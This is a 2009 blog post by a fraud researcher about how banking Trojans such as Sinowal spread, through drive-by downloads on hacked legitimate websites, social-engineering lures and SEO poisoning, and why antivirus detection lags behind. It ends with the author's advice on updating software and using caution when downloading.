Blog article
See all stories »

Good Times in Fraudland: Part II

In my first of three entries summarizing 2009 online fraud trends, I suggested that there had never been a better time to be a cybercriminal, and talked about the high grade Trojans currently available to fraudsters. But to use a modern warfare analogy, even if you have nuclear weapons they aren’t really effective without a robust ballistic missile program that will deliver the payload to the designated targets. And to use the more classic virus analogy, it takes a very effective infection mechanism to turn a lethal virus strain into a global pandemic.

Wildfire Infection

The RSA FraudAction lab exposed the infrastructure of the notorious Sinowal Trojan, also known as Torpig or Mebroot, in October 2008. Sinowal isn’t a Trojan kit and you cannot buy it anywhere: it’s a syndicated organized crime ring that is based in East Europe, spans several continents, and for the past four years its virtual silhouette was glued to every eCrime researcher’s billboard, complete with a “most wanted” sign.

The first thing that caught the team’s attention was the sheer magnitude of the stolen data: there were almost 300,000 compromised PCs, each tapped for one set of online banking credentials and one credit card on average. The other amazing fact was that the server was live since 2006 despite numerous attempts to shut it down; it had a highly resilient framework and good disaster recovery backups.

When the Sinowal data was analyzed, an amazing fact stood out: the pace of infection increased tenfold in summer 2008. If March had 2,500 new computers infected with Sinowal, the rate in September jumped to 25,000.

What caused this massive surge of infection? The immediate suspect was the code itself: perhaps the fraudsters managed to turn the Trojan horse into a lot stealthier. But as the team dug deeper they realized nothing in the code would explain this massive boost of distribution. No, there had to be another explanation.

Which was soon found in Drive by Download.

Here’s a good example for Drive by Download. Try this now: go to and click on the news section on the left. Go down the archive of articles on the right to May 2009, and find the post from 01.05.2009 titled “website security statement”. Read it… Of if you’re too lazy, here’s an earlier account I posted about the incident.

Summer 2008 marked the beginning of an onslaught of drive-by-download attacks, which spread like wildfire through a highly advanced SQL Injection botnet, beefed up by other hacking methods such as taking over websites’ FTP service after stealing the administrator passwords.

The interesting thing about drive by download attacks is that the infection takes place in a perfectly legitimate website with a healthy traffic of perfectly legitimate users. It’s important to note that the only pre-condition is browsing the website: no other user action is needed. Infection is absolutely automatic, and happens as long as the PC isn’t completely patched against the latest security vulnerabilities. Most users do not bother to update their browser version, operating system and internet tools such as Acrobat Reader or Flash; when a software pops up and offers an upgrade, many click on “remind me later”. It’s a bit like getting a knock on your door, and finding a team of doctors bringing you a Swine Flu vaccine. “Not now, remind me later” isn’t what you’re supposed to say.

Right now there are thousands of legitimate websites hacked in order to lead their traffic into infection servers. Not all of them are as visited as PaulMcCartney or Paris Hilton fan sites, but some are. Websense reported in mid 2009 a 671% increase in the number of legitimate websites hijacked for spreading malware compared to last year, and Panda Labs estimated a that over 10 million PCs have already been infected with a financial Trojan. That was a year ago; today the numbers should be in the dozens of millions. And the amazing thing is: people still know nothing about drive by download.

If you keep your PC security fully up to date you stand a good chance against automatic drive by download infection, but can still get infected by downloading an executable file. Here the main advance is: use common sense.

Cybercriminals are aware of this pesky thing called common sense, and develop social engineering methods designed to befuddle your judgment. The best course of action these days is Web 2.0 applications – which fraudsters simply adore – and in particular social networks. If you’re logged into the social network and notice an invitation from a friend to watch a cool video, but when you get to the page the video doesn’t work and the site advises downloading the latest video converter, and after you click on the link a helpful gray box pops up and asks your permission to install the friendly program, don’t click on Run. Because if you do, you’ll be the latest unlucky member of a botnet, and will soon have your PC swarming with Trojans.

Other infection methods include getting an email with an exciting piece of news such as Michael Jackson is Dead! And Ceasefire in Gaza! Here the attack starts with a message delivered via email or social media, with a link leading to an infection site. The same applies to fake Christmas cards or other digital greetings. P2P networks are a great source of infection via compromised files. Then there’s SEO (search engine optimization) tricks deployed by cybercriminals to lead users searching for certain items of interest to the open jaws of a malware server or a fake antivirus.

Speaking of antivirus, it’s important to understand that today’s antivirus technologies find it difficult to keep track with malicious Trojans. Heuristics work well for certain Trojan families but not for all, and the main tool for identifying crimeware remains the virus signature. However Trojan kits such as Zeus allow you to build new variants on the fly, so by the time the AV company has an up to date signature, victims already download the new, untraceable code. Cisco published a research showing only 40% of Trojans released to the web get detected by over half of the leading AVs; Trusteer reported that fully up to date AVs were successful in detecting Zeus only 23% of the times, and that 55% of the PCs running Zeus had a fully up to date AV.

AV companies responded by developing community-based threat reporting, cloud-based protection or reputation-based security These directions pose new challenges for Trojan builders, but it will take time to see the impact on the upward trend in infection.

To summarize, things have changed dramatically in the past year when it comes to infection. The rate of infection today is 10 times higher than last year; rather than the Internet becoming a better place, things actually get worse. No longer should people worry just about files sent through email; today they can catch something by browsing a legitimate website or clicking on links to see fake videos.

Many people ask me “so what do YOU do to protect yourself?” – and my answer is: I use common sense and never download any applications unless I initiated the download myself; I enable automatic updates of the operating system and every Internet tool I use. Oh, and I never use my wife’s computer to access online banking or shop online. God knows what kind of stuff she downloads ;)





Comments: (0)

Uri Rivner

Uri Rivner

CEO and Co-Founder

Refine Intelligence

Member since

14 Apr 2008


Tel Aviv

Blog posts




This post is from a series of posts in the group:

Innovation in Financial Services

A discussion of trends in innovation management within financial institutions, and the key processes, technology and cultural shifts driving innovation.

See all

Now hiring